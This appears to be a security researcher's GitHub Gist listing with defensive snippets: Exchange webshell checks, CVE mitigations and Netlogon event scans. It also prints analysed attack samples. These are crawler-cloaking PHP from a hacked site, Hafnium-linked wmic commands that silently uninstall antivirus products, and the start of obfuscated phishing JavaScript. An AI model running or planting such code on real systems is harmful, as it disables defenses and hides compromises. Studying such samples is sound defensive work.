Skip to content

Instantly share code, notes, and snippets.

Exchange IIS Server Integrity Check
Identify common webshells and backdoors associated with compromises
Prepare a hash list. Note this may need to be updated after Microsoft Exchange updates
Write-IntegrityFile [ -hashfile "filename.json" ]
technion / hacked.php
Created December 30, 2021 09:01
hacked php
if(!empty($_SERVER['HTTP_USER_AGENT'])){$userAgents = array("Google","Slurp","MSNBot","ia_archiver","Yandex","Rambler","bot","spider");if(preg_match('/'.implode('|',$userAgents).'/i',$_SERVER['HTTP_USER_AGENT'])){header('HTTP/1.0 404 Not Found');exit;}}
technion / Exchange Version.nse
Created November 17, 2021 22:50
Scan Microsoft Exchange Version for vulnerability
local http = require "http"
local shortport = require "shortport"
local stdnse = require "stdnse"
local table = require "table"
local string = require "string"
author = {""}
license = "Same as Nmap--See"
categories = {"discovery", "safe"}
-- Detection rule based on:
technion / CVE-2021-40444Mit.ps1
Last active September 12, 2021 08:43
CVE-2021-40444 Mitigation Script
Set-Strictmode -Version 2
# Applies reg keys from
# Although the above document is still "Revision 1.0", Microsoft has removed the WOW6432 section
for($i = 0; $i -le 3; $i++) {
$RegPath = "HKLM:\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\$i"
if (-not (Test-Path $RegPath)) {
New-Item $RegPath -Force
technion / AutorunsVT.ps1
Created April 23, 2021 01:05
Review CSV file from autorunsc.exe a and handle Virustotal detections
$autorunsCsv = "\AutorunsOutput.csv"
$autorunsArray = Import-Csv $autorunsCsv
Foreach ($item in $autorunsArray) {
$detection = $item.'VT detection'
if ($detection -eq "" -or $detection -eq 'Unknown') {
Write-Output $detection
technion / Malicious.ps1
Created March 20, 2021 09:45
RE on Hafnium exploited server
cmd /c start /b wmic.exe product where "name like '%Eset%'" call uninstall /nointeractive
cmd /c start /b wmic.exe product where "name like '%%Kaspersky%%'" call uninstall /nointeractive
cmd /c start /b wmic.exe product where "name like '%avast%'" call uninstall /nointeractive
cmd /c start /b wmic.exe product where "name like '%avp%'" call uninstall /nointeractive
cmd /c start /b wmic.exe product where "name like '%Security%'" call uninstall /nointeractive
technion / LicenseManagement.ps1
Created November 13, 2020 00:29
Office 365 license management
Set-StrictMode -Version 2
# Connect first
# Connect-AzureAD
function Get-LicencesforUser
# $user should be populated with
# $user = Get-AzureADUser -ObjectId
technion / tank.wa
Created November 12, 2020 07:04
Warlock tanking weak aura
technion / Scan-Netlogon-Secure.ps1
Last active August 16, 2020 23:30
Search domain controllers for events relating to Netlogon vulnerability
# More information:
Set-StrictMode -Version 2
# Fetch all Domain Controllers. Use this pattern to fetch from all sites.
$addomain = Get-ADDomain
$controllers = Get-ADComputer -filter * -SearchBase "OU=Domain Controllers,$($addomain.DistinguishedName)"
foreach ($dc in $controllers) {
# Errors are ignored so as not to throw an exception if there are no such logs found
Get-WinEvent -FilterHashtable @{logname='system'; id=5827,5828,5829,5830,5831} -ComputerName $dc.Name -ErrorAction Ignore
technion / phishing.js
Last active August 12, 2020 03:46
blog of phishing code
'use strict';
/** @type {!Array} */
var _0xd60a = ["call", "unknown BTYPE: ", "innerHTML", "lazy", "invalid code length: ", "subarray", "createElement", "invalid compression type", "decompress", "input buffer is broken", "POSITIVE_INFINITY", "index", "verify", "charCodeAt", "bufferSize", "invalid uncompressed block header: LEN", "var ", "compile", "fromCodePoint", "finish", "bufferType", "shift", "compressionType", "input", "Zlib.Inflate.prototype.decompress", "invalid inflate mode", "slice", "NONE", "appendChild", "length", "string",
"Zlib.Inflate", "textContent", "prototype", "Zlib.Deflate.compress", "resize", "number", "invalid index", "documentElement", "buffer", "undefined", "trim", "unsupported compression type", "keys", "constructor", "Inflate", "unsupported compression method", "a9ae92d3-ee4f-4bc1-a8c5-7cff21373a99", "split", 'return /" + this + "/', "invalid adler-32 checksum", "getParent", "close", "invalid length: ", "push", "fromCharCode", "invalid code: ", "Zlib.Deflate.CompressionType", "write"